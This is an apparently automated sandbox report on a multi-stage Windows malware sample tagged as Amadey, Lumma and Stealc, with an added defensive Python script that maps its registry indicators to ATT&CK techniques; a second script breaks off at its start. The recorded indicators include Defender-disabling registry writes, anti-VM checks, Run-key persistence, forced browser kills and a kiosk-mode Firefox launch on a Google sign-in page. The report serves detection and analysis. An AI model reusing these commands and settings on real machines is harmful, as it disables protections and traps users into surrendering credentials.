Malware Analysis Report

2025-01-22 14:52

Sample ID 241206-ds7kaatmbq
Target ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe
SHA256 ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4
Tags
amadey gcleaner lumma stealc 9c9aa5 drum discovery evasion loader persistence stealer trojan orcus ta505 xmrig execution miner rat spyware
score
10/10

Table of Contents

Analysis Overview
MITRE ATT&CK (Enterprise Matrix V15)
Analysis: static1 (Detonation Overview; Signatures)
Analysis: behavioral1 (Detonation Overview; Command Line; Signatures; Processes; Network; Files)
Analysis: behavioral2 (Detonation Overview; Command Line; Signatures; Processes; Network; Files)

Analysis Overview

score
10/10

SHA256

ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4

Threat Level: Known bad

The file ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe was found to be: Known bad.

Malicious Activity Summary

amadey gcleaner lumma stealc 9c9aa5 drum discovery evasion loader persistence stealer trojan orcus ta505 xmrig execution miner rat spyware

Xmrig family

Orcus family

Lumma family

xmrig

Amadey

XMRig Miner payload

TA505

Orcus

Suspicious use of NtCreateUserProcessOtherParentProcess

Lumma Stealer, LummaC

Gcleaner family

Modifies Windows Defender Real-time Protection settings

Stealc

GCleaner

Stealc family

Ta505 family

Amadey family

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Orcus RAT Executable

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Checks computer location settings

Loads dropped DLL

Windows security modification

Executes dropped EXE

Checks BIOS information in registry

Identifies Wine through registry keys

Adds Run key to start application

Looks up external IP address via web service

AutoIT Executable

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

Drops file in Windows directory

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Kills process with taskkill

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Checks processor information in registry

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Runs net.exe

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Scheduled Task/Job: Scheduled Task

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-12-06 03:17

Signatures

Unsigned PE

No per-row detail recorded for this signature (Description, Indicator, Process and Target are all N/A).

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-06 03:17

Reported

2024-12-06 03:19

Platform

win7-20240903-en

Max time kernel

150s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"

Signatures

Amadey

trojan amadey

Amadey family

amadey

GCleaner

loader gcleaner

Gcleaner family

gcleaner

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A

Stealc

stealer stealc

Stealc family

stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe | N/A
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A

Identifies Wine through registry keys

evasion
Description | Indicator | Process | Target
Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe | N/A
Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A

Adds Run key to start application

persistence
Description | Indicator | Process | Target
Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ac08ad066b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012590001\\ac08ad066b.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\f3faf6e172.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012591001\\f3faf6e172.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\53cf2003b2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012592001\\53cf2003b2.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A
Set value (str) | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\6f0a087fd3.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012593001\\6f0a087fd3.exe" | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A

AutoIT Executable

No per-row detail recorded for this signature (Description, Indicator, Process and Target are all N/A).

Drops file in Windows directory

Description | Indicator | Process | Target
File created | C:\Windows\Tasks\skotes.job | C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe | N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe | N/A
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A
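The registry tables in this section (Defender real-time protection and TamperProtection writes, the VBOX__/BIOS/Wine reads, the Run-key writes and the NLS\Language reads) all share one row shape. The script below is an added example, not part of the sandbox report or its signature engine: it parses rows in that shape, maps each to an ATT&CK technique, and reports which Defender settings were pushed to their disabled value and where the Run keys point. The sample rows are copied from the tables above; the rules, the technique IDs and the read/write split are this editor's mapping and should be treated as assumptions.

```python
"""Classify registry indicators from the tables above into ATT&CK techniques.

Added example; not part of the sandbox report or its signature engine.
The sample rows are copied from this section's tables; the rules, the
technique IDs and the parsing are the author's own mapping.
"""
import re
from collections import Counter

OPS = ("Set value (int)", "Set value (str)", "Key created", "Key opened",
       "Key value queried")
WRITES = {"Set value (int)", "Set value (str)", "Key created"}
READS = {"Key opened", "Key value queried"}

# (rule, ATT&CK technique, pattern over the registry path, operations that
# count). Evasion checks only fire on reads and tamper/persistence only on
# writes, so a legitimate read of a Defender key does not match.
RULES = [
    ("defender_tamper", "T1562.001",
     re.compile(r"\\Windows Defender\\", re.I), WRITES),
    ("run_key_persistence", "T1547.001",
     re.compile(r"\\CurrentVersion\\Run\\", re.I), WRITES),
    ("vm_detection", "T1497.001",
     re.compile(r"\\ACPI\\DSDT\\VBOX__$|\\(System|Video)BiosVersion$|\\Software\\Wine$", re.I),
     READS),
    ("language_discovery", "T1614.001",
     re.compile(r"\\Control\\NLS\\Language", re.I), READS),
]

# Rows copied from the tables above (one of each kind).
SAMPLE_ROWS = [
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe N/A',
    r'Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    r'Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    r'Key opened \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows\CurrentVersion\Run\ac08ad066b.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1012590001\\ac08ad066b.exe" C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe N/A',
    r'Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A',
]

# Registry paths may contain spaces; the process column always starts with a
# drive letter, so split at the first " X:\" boundary.
PATH_PROC_RE = re.compile(r"^(?P<path>.*?) (?P<process>[A-Za-z]:\\.*)$")


def parse_row(row):
    """Split one 'Description Indicator Process Target' row into its fields."""
    body, target = row.strip().rsplit(" ", 1)
    op = next((o for o in OPS if body.startswith(o + " ")), None)
    if op is None:
        raise ValueError(f"unknown operation in row: {row!r}")
    rest, value = body[len(op) + 1:], None
    if ' = "' in rest:
        # Written values are quoted, so the closing quote ends the value.
        path, tail = rest.split(' = "', 1)
        value, process = tail.split('"', 1)
        process = process.strip()
    else:
        m = PATH_PROC_RE.match(rest)
        if m is None:
            raise ValueError(f"cannot split path from process: {row!r}")
        path, process = m["path"], m["process"]
    return {"op": op, "path": path, "value": value,
            "process": process, "target": target}


def classify(rows):
    """Attach the first matching rule to each row; unmatched rows are kept."""
    out = []
    for row in rows:
        rec = parse_row(row)
        rec["rule"], rec["technique"] = None, None
        for rule, technique, pattern, ops in RULES:
            if rec["op"] in ops and pattern.search(rec["path"]):
                rec["rule"], rec["technique"] = rule, technique
                break
        out.append(rec)
    return out


def defender_state(records):
    """Which Defender settings were written to their disabled value."""
    state = {}
    for r in records:
        if r["rule"] != "defender_tamper" or r["value"] is None:
            continue
        setting = r["path"].rsplit("\\", 1)[-1]
        state[setting] = ((setting.startswith("Disable") and r["value"] == "1")
                          or (setting == "TamperProtection" and r["value"] == "0"))
    return state


def persistence_targets(records):
    """Executables the Run-key writes point at."""
    return [r["value"] for r in records if r["rule"] == "run_key_persistence"]


def summarize(records):
    """Per-process technique counts, for a summary table."""
    return Counter((r["process"].rsplit("\\", 1)[-1], r["technique"])
                   for r in records if r["technique"])


if __name__ == "__main__":
    recs = classify(SAMPLE_ROWS)
    for (proc, tech), n in sorted(summarize(recs).items()):
        print(f"{proc:<20} {tech:<10} {n}")
    print("Defender:", defender_state(recs))
    print("Run-key targets:", persistence_targets(recs))
```

Note that the rules key on the operation as well as the path: reading a Defender policy key is what the Security Center does all day, while writing DisableRealtimeMonitoring = 1 or TamperProtection = 0 is not, so the Defender rule only matches writes, and the VirtualBox/BIOS/Wine rule only matches reads.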

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel | C:\Program Files\Mozilla Firefox\firefox.exe | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Kills process with taskkill

evasion
C:\Windows\SysWOW64\taskkill.exe was spawned 5 times; no further per-row detail was recorded (Description, Indicator and Target are N/A). The five command lines, one per browser image, are listed under Processes.

Modifies registry class

Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000_Classes\Local Settings | C:\Program Files\Mozilla Firefox\firefox.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target | Rows
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A | 5
Token: SeDebugPrivilege | N/A | C:\Program Files\Mozilla Firefox\firefox.exe | N/A | 2
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | N/A | 1

Suspicious use of WriteProcessMemory

Description | Process (writer) | Target (written to) | Rows
PID 3020 wrote to memory of 2808 | C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | 4
PID 2808 wrote to memory of 2820 | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe | 4
PID 2808 wrote to memory of 1156 | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe | 4
PID 2808 wrote to memory of 1320 | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe | 4
PID 2808 wrote to memory of 1976 | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | 4
PID 1976 wrote to memory of 2156 | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | C:\Windows\SysWOW64\taskkill.exe | 4
PID 1976 wrote to memory of 2976 | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | C:\Windows\SysWOW64\taskkill.exe | 4
PID 1976 wrote to memory of 2736 | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | C:\Windows\SysWOW64\taskkill.exe | 4
PID 1976 wrote to memory of 2780 | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | C:\Windows\SysWOW64\taskkill.exe | 4
PID 1976 wrote to memory of 1716 | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | C:\Windows\SysWOW64\taskkill.exe | 4
PID 1976 wrote to memory of 2772 | C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe | C:\Program Files\Mozilla Firefox\firefox.exe | 4
PID 2772 wrote to memory of 2320 | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe | 12
PID 2320 wrote to memory of 2268 | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe | 3
PID 2808 wrote to memory of 2924 | C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe | C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe | 4
PID 2320 wrote to memory of 900 | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Program Files\Mozilla Firefox\firefox.exe | 1
(The Indicator column is N/A on every row; identical consecutive rows are collapsed into the Rows count.)

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe

"C:\Users\Admin\AppData\Local\Temp\ca2d328cf8d3bb990c47a4ea62d67eff34f06a00b7a3a7bf5189120da96d8bc4.exe"

C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe

"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"

C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe

"C:\Users\Admin\AppData\Local\Temp\1012589001\3b61988b61.exe"

C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe

"C:\Users\Admin\AppData\Local\Temp\1012590001\ac08ad066b.exe"

C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe

"C:\Users\Admin\AppData\Local\Temp\1012591001\f3faf6e172.exe"

C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe

"C:\Users\Admin\AppData\Local\Temp\1012592001\53cf2003b2.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefox.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM chrome.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msedge.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM opera.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM brave.exe /T

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.0.1717898442\979513787" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1232 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {765321ea-8755-446d-abb5-b74f7632dc13} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 1304 120f5658 gpu

C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe

"C:\Users\Admin\AppData\Local\Temp\1012593001\6f0a087fd3.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.1.787943249\1778487959" -parentBuildID 20221007134813 -prefsHandle 1492 -prefMapHandle 1488 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e942b38f-e386-4267-951d-bd63f1a46051} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 1520 d72158 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.2.1105286659\735900395" -childID 1 -isForBrowser -prefsHandle 1832 -prefMapHandle 1892 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {6844f706-8ff9-4ac3-b56d-8fb53b74faa4} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 1868 1a7bc958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.3.673695842\1448226716" -childID 2 -isForBrowser -prefsHandle 2816 -prefMapHandle 2812 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {28c756ef-ea48-4060-9f19-2399489af3df} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 2828 d5ff58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.4.1581879930\2108902196" -childID 3 -isForBrowser -prefsHandle 3564 -prefMapHandle 2848 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cd8f0d83-6d68-4d10-b243-63335240bc6a} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 3576 1fbce358 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.5.680923518\757878139" -childID 4 -isForBrowser -prefsHandle 3700 -prefMapHandle 3704 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f32c076-bcbc-485c-b44a-a6a32a77c5d5} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 3776 1fb55a58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2320.6.1976883581\966569802" -childID 5 -isForBrowser -prefsHandle 3932 -prefMapHandle 3936 -prefsLen 26275 -prefMapSize 233444 -jsInitHandle 844 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a46490c3-68fd-4817-bc38-9d3849ddca9b} 2320 "\\.\pipe\gecko-crash-server-pipe.2320" 3920 1f970958 tab
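The injection rows above give the parent/child relationships by PID, and the Processes list gives the command lines: five taskkill /F /IM <browser> /T calls followed by Firefox started with --kiosk on a YouTube account URL that carries a Google sign-in challenge path, with popup blocking disabled. Read together, this editor takes that for a browser-lock credential lure; the sandbox itself does not say so. The script below is an added example, not part of the sandbox report: it rebuilds the process tree from rows in the WriteProcessMemory format, flags command lines that force-kill browsers or pin a kiosk-mode browser to a sign-in URL, and prints each hit with its ancestry back to the submitted sample. The rows are a subset copied from the table; the PID-to-command-line pairing is this editor's reading of the two tables (the report prints PIDs only in the injection rows), and the regexes are assumptions.

```python
"""Rebuild the process tree from the WriteProcessMemory rows and flag the
browser-kill / kiosk-mode chain in the command lines.

Added example; not part of the sandbox report. The injection rows are a
subset copied from the table above; the PID-to-command-line pairing is the
author's reading of the two tables, and the suspicious-command rules are
the author's own.
"""
import re
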